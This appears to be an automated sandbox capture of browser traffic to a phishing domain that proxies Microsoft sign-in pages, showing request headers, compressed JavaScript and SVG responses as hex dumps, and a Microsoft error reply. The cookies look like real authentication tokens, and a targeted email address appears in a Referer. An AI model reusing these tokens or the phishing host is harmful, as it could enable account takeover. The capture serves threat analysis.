                                                                              2025-01-10 20:42:07 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.549936207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:07 UTC1496OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC1406INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 109863
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT
                                                                              ETag: 0x8DAFF34DD9DC630
                                                                              x-ms-request-id: 7c71ce12-201e-0029-80a0-638a9d000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204207Z-155884f84d46sft9hC1BL1yxu40000000btg000000008akz
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:07 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91
                                                                              Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$|zmk3h-SznuJ2V.tx~%Y
                                                                              2025-01-10 20:42:07 UTC1406INData Raw: c4 83 45 a5 d2 a7 c9 61 9f 24 3d 2b 31 6b 72 6b 95 a9 2b 79 ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44
                                                                              Data Ascii: Ea$=+1krk+yzxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)|*w{%8-q<hq_m;>9{oY={(ka9)D
                                                                              2025-01-10 20:42:07 UTC9510INData Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3
                                                                              Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S|we7-<B^3v`vbp[C(&u3NTJ
                                                                              2025-01-10 20:42:07 UTC6289INData Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6
                                                                              Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2*w'u0dH3kOV1CO"e]:.>vIXU+} ;o*lg-n>u'9K<7EE<}k<M


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.549937207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:07 UTC1769OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:07 UTC799INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 621
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                                              ETag: 0x8D8852A7FA6B761
                                                                              x-ms-request-id: c2d48e52-801e-0038-1487-636796000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204207Z-1698bcdb8c7xh6s7hC1BL1h76w0000000bt000000000snvy
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:07 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                              Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.549943207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:08 UTC1481OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:09 UTC779INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:09 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 621
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                                              ETag: 0x8D8852A7FA6B761
                                                                              x-ms-request-id: 920ec531-901e-0079-24a0-633f72000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204209Z-155884f84d4r9pqfhC1BL117bn0000000br000000001580e
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:09 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                              Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.549957207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:11 UTC1417OUTGET /common/instrumentation/dssostatus HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:11 UTC2474INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/json; charset=utf-8
                                                                              Expires: -1
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Access-Control-Allow-Origin: https://autologon.microsoftazuread-sso.com/
                                                                              Access-Control-Allow-Credentials: true
                                                                              Access-Control-Allow-Methods: POST, OPTIONS
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              x-ms-request-id: 80a8b1af-8a0d-46c4-b51e-12ec98123c00
                                                                              x-ms-ests-server: 2.1.19683.6 - SCUS ProdSlices
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              x-ms-srs: 1.P
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-RHGLmr8B4qkUpJBvEGl7yQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              Set-Cookie: fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; expires=Sun, 09-Feb-2025 20:42:11 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Fri, 10 Jan 2025 20:42:11 GMT
                                                                              Connection: close
                                                                              content-length: 164
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:11 UTC164INData Raw: 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 30 66 31 30 63 37 65 33 2d 38 39 33 66 2d 34 65 33 39 2d 38 39 35 38 2d 61 32 38 64 31 63 38 30 65 36 39 39 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 20 32 30 3a 34 32 3a 31 31 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d
                                                                              Data Ascii: {"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"0f10c7e3-893f-4e39-8958-a28d1c80e699","timestamp":"2025-01-10 20:42:11Z","message":"AADSTS900561"}}


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              60192.168.2.55008135.190.80.1443
                                                                              TimestampBytes transferredDirectionData
